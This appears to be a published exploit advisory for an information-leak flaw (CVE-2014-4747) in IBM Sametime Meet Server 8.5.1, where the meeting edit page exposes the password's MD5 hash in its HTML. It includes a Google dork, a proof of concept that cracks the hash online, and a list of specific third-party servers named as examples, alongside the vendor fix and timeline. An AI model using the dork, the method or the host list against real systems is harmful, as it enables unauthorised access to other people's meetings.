IBM Sametime Meet Server 8.5 Password Disclosure

`# Exploit Title: IBM Sametime Meet Server 8.5 Password Disclosure  
# Google Dork: intitle:"Meeting Center - IBM Lotus Sametime"  
# Date: 11/08/2014  
# CVSS Score: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=AV:L/AC:L/Au:N/C:P/I:N/A:N  
# CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4747  
# OSVDB-ID: http://osvdb.org/109443  
#  
# Author: Adriano Marcio Monteiro  
# E-mail: [email protected]  
# Blog: http://www.brazucasecurity.com.br  
#   
# Vendor: http://www.ibm.com  
# Software: http://www.ibm.com/sametime  
# Version: 8.5.1  
# Advisory: https://www-304.ibm.com/support/docview.wss?uid=swg21679221  
#   
# Test Type: Black Box  
# Tested on: Windows 7 Enterprise SP1 x86 pt-br, Mozilla Firefox 30.0 /Internet Explorer 10 / Google Chrome Versão 33.0.1750.146 m  
  
  
  
Table of Contents  
  
[0x00] The Vulnerability  
[0x01] Exploit Description  
[0x02] PoC - Proof of Concept  
[0x03] Correction or Workaround  
[0x04] Timeline  
[0x05] Published  
[0x06] References  
[0x07] Bibliography  
  
  
  
[0x00] The Vulnerabilty  
  
Password Disclosure  
Revealing system data or debugging information helps an adversary learn about the system and form a plan of attack. An information leak occurs when system data or debugging information leaves the program through an output stream or logging function.  
  
  
  
[0x01] Exploit Description  
  
On the page that allows editing a meeting is possible to retrieve the MD5 hash of the password of the meeting just by reading the HTML source code of the page.  
  
  
  
[0x02] PoC - Proof of Concept  
  
For exploit this vulnerability you only need to analyze the source code of page.  
  
http://sametime02.myserver.com.br/stconf.nsf/meeting/8635AEFF1CBFAAF283257D09004602CE?editdocument&1404305088536  
  
[...]  
<input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="Password" id="pw">  
<input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="ConfirmPassword" id="rpw">  
[...]  
  
http://www.md5online.org  
E1FAFFB3E614E6C2FBA74296962386B7 -> Found: AAA  
  
Examples:  
  
http://sametime.eletrosul.gov.br/stconf.nsf/frmConference?OpenForm  
http://sametime.sp.gov.br/stconf.nsf/frmConference?OpenForm  
http://sametime.grude.ufmg.br/stconf.nsf/frmConference?OpenForm  
http://sametime.schahin.com.br/stconf.nsf/frmConference?OpenForm  
http://sametime.c-pack.com.br/stconf.nsf/frmConference?OpenForm  
http://www.azi.com.br/stconf.nsf/frmConference?OpenForm  
http://aquila.sealinc.org/stconf.nsf/frmConference?Openform  
http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform  
http://comware.net/stconf.nsf/frmConference?Openform  
https://236ws.dpteruel.es/stconf.nsf/frmConference?OpenForm  
https://correoweb.gruposanjose.biz/stconf.nsf/frmConference?Openform  
http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform  
https://mail.dba.uz/stconf.nsf/frmConference?Openform  
  
  
  
[0x03] Correction or Workaround  
  
Apply the procedures described in the follow link:  
http://www-01.ibm.com/support/docview.wss?uid=swg21679454  
  
  
  
[0x04] Timeline  
  
18/07/2014 - Vulnerabilities discovered  
19/07/2014 - Vulnerabilities reporteds to IBM PSIRT Team  
23/07/2014 - Advisory and troubleshooting fix published  
  
  
  
[0x05] Published  
  
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4747  
http://www.securityfocus.com/bid/68823  
  
  
  
[0x06] References  
  
Information Leakage  
https://www.owasp.org/index.php/Information_Leakage  
  
CWE-200: Information Exposure  
http://cwe.mitre.org/data/definitions/200.html  
  
  
  
[0x07] Bibliography  
  
http://www-10.lotus.com/ldd/stwiki.nsf/xpDocViewer.xsp?lookupName=Administering+Sametime+Standard+8.5.2+documentation#action=openDocument&res_title=Sametime_Meeting_Server_st852&content=pdcontent  
  
  
  
[end]  
`